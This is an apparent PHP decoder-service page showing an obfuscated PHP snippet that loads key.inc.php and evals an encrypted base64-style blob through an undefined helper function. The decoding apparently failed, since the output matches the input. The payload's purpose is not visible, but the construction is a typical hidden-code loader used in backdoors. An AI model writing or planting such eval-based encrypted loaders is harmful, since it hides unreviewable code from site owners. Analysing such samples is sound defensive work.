Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php if(!function_exists('openssl_decrypt')){die('<h2>Function openssl_decrypt() not fou..

Decoded Output download

<?php 
if(!function_exists('openssl_decrypt')){die('<h2>Function openssl_decrypt() not found !</h2>');} 
if(!defined('_FILE_')){define("_FILE_",getcwd().DIRECTORY_SEPARATOR.basename($_SERVER['PHP_SELF']),false);} 
if(!defined('_DIR_')){define("_DIR_",getcwd(),false);} 
if(file_exists('key.inc.php')){include_once('key.inc.php');}else{die('<h2>File key.inc.php not found !</h2>');} 
$e7091="YkxWT1hyNDU0OGJhdlZDUW5vcDhxRVVpd0h2dWZBcjl6TGQ4eVZzZy9sYlhpYnh2MWl0cmxycGZVcC9VNGF1VGY2Z2Y3bVlxaGxxcmRIZ05UcFphbFVCaE96TVFaRGRZMktsNEJjdDgzTHhKMWJlQ1ZhWjlEUmxWZ3JVZldSUUlPM0JuRHR3MG5RNGtiVkpIOTZyWk1zOEF2c2xWcExLRXpaVWJiQlBPUWJjdzY1bThxUUVCellzNnA0NG41b3E1";eval(e7061($e7091)); 
?>

Did this file decode correctly?

Original Code

<?php
if(!function_exists('openssl_decrypt')){die('<h2>Function openssl_decrypt() not found !</h2>');}
if(!defined('_FILE_')){define("_FILE_",getcwd().DIRECTORY_SEPARATOR.basename($_SERVER['PHP_SELF']),false);}
if(!defined('_DIR_')){define("_DIR_",getcwd(),false);}
if(file_exists('key.inc.php')){include_once('key.inc.php');}else{die('<h2>File key.inc.php not found !</h2>');}
$e7091="YkxWT1hyNDU0OGJhdlZDUW5vcDhxRVVpd0h2dWZBcjl6TGQ4eVZzZy9sYlhpYnh2MWl0cmxycGZVcC9VNGF1VGY2Z2Y3bVlxaGxxcmRIZ05UcFphbFVCaE96TVFaRGRZMktsNEJjdDgzTHhKMWJlQ1ZhWjlEUmxWZ3JVZldSUUlPM0JuRHR3MG5RNGtiVkpIOTZyWk1zOEF2c2xWcExLRXpaVWJiQlBPUWJjdzY1bThxUUVCellzNnA0NG41b3E1";eval(e7061($e7091));
?>

Function Calls

defined 1
function_exists 1

Variables

None

Stats

MD5 1622dc7971f2e2f916628df646998cce
Eval Count 0
Decode Time 57 ms